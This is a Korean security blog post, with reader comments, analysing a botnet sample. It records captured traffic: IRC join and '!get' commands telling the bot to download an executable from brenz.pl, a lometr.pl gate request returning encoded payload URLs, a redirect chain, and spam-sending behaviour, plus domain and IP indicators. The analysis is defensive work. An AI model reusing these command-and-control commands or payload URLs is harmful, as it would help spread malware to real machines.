0x02 analysis2009. 6. 19. 15:58

해당 악성코드는 아직 분석 중인데 급히 차단해야 할 도메인이 있어 분석 도중 포스팅합니다.

해당 악성코드를 실행하면 proxima.ircgalaxy.pl로 접속합니다.




IRC 서버로 유명한 녀석이죠..

재수 좋았던건지는 모르겠지만 봇 마스터를 다른 사이트에서 파일을 다운로드하라고 명령을 내리더군요

NICK kwfqkmyt
USER d020501 . . :_Service Pack 3
JOIN &virtu
:u. PRIVMSG kwfqkmyt :!get
http://brenz.pl/ex/a.php

다운로드하는 파일은 exe 파일이었습니다.




그리고 나서 lometr.pl에 접속해서 /mega/lgate.php?n=5B3590E0FB840577 를 요청하고 brenz.pl에서 /dll/abb.txt 파일과 /met/ge.txt 파일을 다운로드하였습니다.






lometr.pl에 요청한 파일에 대한 결과는 암호화된 내용이라 어떤 내용인지 확인을 하지 못했습니다.

GET /mega/lgate.php?n=5B3590E0FB840577 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: lometr.pl
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 19 Jun 2009 01:39:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Content-Length: 80
 
MSBodHRwOi8vYnJlbnoucGwvZGxsL2FiYi50eHQgMSBodHRwOi8vYnJlbnoucGwvbWV0L2dlLnR4dCAx


추가적으로 www.upononjob.cn에서 특정 파일에 접근하고 나서 또 다른 도메인으로 리다이렉션되고 있었습니다.



GET /in.cgi?0032 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 19 Jun 2009 01:39:29 GMT
Content-Type: text/html
Connection: close
Set-Cookie: SL_0032_0000=_1_; domain=www.upononjob.cn; path=/; expires=Sun, 19-Jul-2009 01:39:28 GMT
Set-Cookie: TSUSER=0032; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=www.upononjob.cn
 
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://horobl.cn/index.html'">
</head>
<body>
document moved <a href="
http://horobl.cn/index.html">here</a>
</body>
</html>


보시는 것과 같이 horobl.cn으로 리다이렉션되는데 연결도 안되고 DNS에서 쿼리를 날려봐도 IP가 나오지 않았습니다.
악성코드 제작자가 실수한걸까요? ㅋ

이렇게 몇개의 도메인에 접속하고 파일 받고 하는 과정에서 몇개의 IP와도 특정 데이터를 송수신하고 있었는데 모두 암호화되어 있어서 확인을 못했습니다.
그리고 이후에는 루트 네임서버로 hotmail.com, gmail.com, web.de, aol.com, yahoo.com의 MX 레코드를 질의하더니 조금 후에는 랜덤한 DNS로 랜덤한 도메인에 대한 MX 레코드값을 질의하고 있었습니다.

질의 후에는 메일서버를 통해 스팸메일로 보이는 메일을 다량으로 보내고 있었습니다.





추가 도메인에서 받은 파일은 내일 분석해볼 생각입니다. ^^





Posted by demantos

댓글을 달아 주세요

  1. 고양이

    130.13.181.196 (QWEST.NET):
    QWEST BROADBAND SERVICES INC,
    PHOENIX, ARIZONA, US. 218.93.205.24:65520 CN:proxim.ircgalaxy.pl
    CN:goasi.cn
    CN:lometr.pl
    CN:www.upononjob.cn
    CN:put.ghura.pl
    :horobl.cn
    IL:dvpjd.wwlax.com
    IL:bugreport.waverevenue.com
    IL:xul93.pubdomainstr.com 135 pcap raw alerts
    ruleset irc
    http
    32 lines
    [출처] 최근 공격에 대한 정리표 (보안(security)초보스터디) |작성자 챨리

    검색해보니까 이러내요...봇넷..ㅠㅁㅠ


    출처는 http://cafe.naver.com/sec.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=1555 입니다~

    2009.06.19 17:06 [ ADDR : EDIT/ DEL : REPLY ]
  2. 고양이

    아니에요^^......
    저야말로 이곳에와서 좋은정보 얻어가는걸요^^
    맨날 눈팅만 하다가 글남기니까 좋내요 ㅎㅎ.......

    2009.06.20 02:28 [ ADDR : EDIT/ DEL : REPLY ]